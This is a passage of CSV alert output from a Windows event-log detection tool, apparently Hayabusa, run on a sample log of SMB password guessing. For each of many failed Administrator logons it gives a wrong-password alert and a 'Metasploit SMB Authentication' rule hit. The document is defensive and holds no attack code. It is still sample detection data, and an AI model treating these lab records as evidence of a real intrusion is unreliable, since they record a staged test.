Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tBhApsBYa65Hxr0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITv5RS3WHhWe0Hez : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WASvcAp9zfU3uSka : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H1f6szOactEp5ntF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Loe5RkT9Ki0Aw2Lv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJdVtE7dNSoyM3LI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QlAtU1mIO7m5DnuP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wAK2rh94yKwiH2Nw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AuqsvmUbPlpWFBRZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BShEB6VnXkOxwtFB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AjAc5QMvpTBsDziO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fwwp5CD20dR8QrIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tL6GzVzndZL7DZMN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zK5IpESvDA2DexwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qvTyabCyGaxscOrN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FW8VghddPwP5C6dO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGZuyZ0LErZ3Sgty : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bT1xrvfndr5R8Vg3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H6RFTZVJE9remzqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pzjwzORvTwuBPLEs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UMjSFfZ88BV2sT1F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SnpCLI2EJZRhr3vz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ztEU2m9SwbqgSdVY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MHO1X0zwmoWotcM4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ck429g2Cs4siVVq4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9txH9zA3oY885iTi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: alIIEzE2rTrNtOtr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ww4BXLwhaNxOttgo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GPdz2pjDocMWqctT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QOm1i2a20IDNmIu4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ukSrSu516dHlHQ94 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: grdERCipFl1FMB1o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmpuUsIRbp57KCRD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VWLuqrOQSQuqcwUr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eEASOf84AX8ow4vf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IcgNTGlESh6FytEY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OeVo7D3oBsdUMHfj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mLqSB2yGMksaBgUS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y7qRzzpL2YhfIGSD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvE5tMw3MjDhA0Fe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aXuNgOkIzvKIuJki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q8vPHEXrxVpUyKZq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vk7sh6VM7AZQv2in : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jurt5hAg90y1VWdT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MlrPbTbJRTxFakiv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RQ5cWmYL8weCCRT0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k0v2Emgn7BD1STZl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 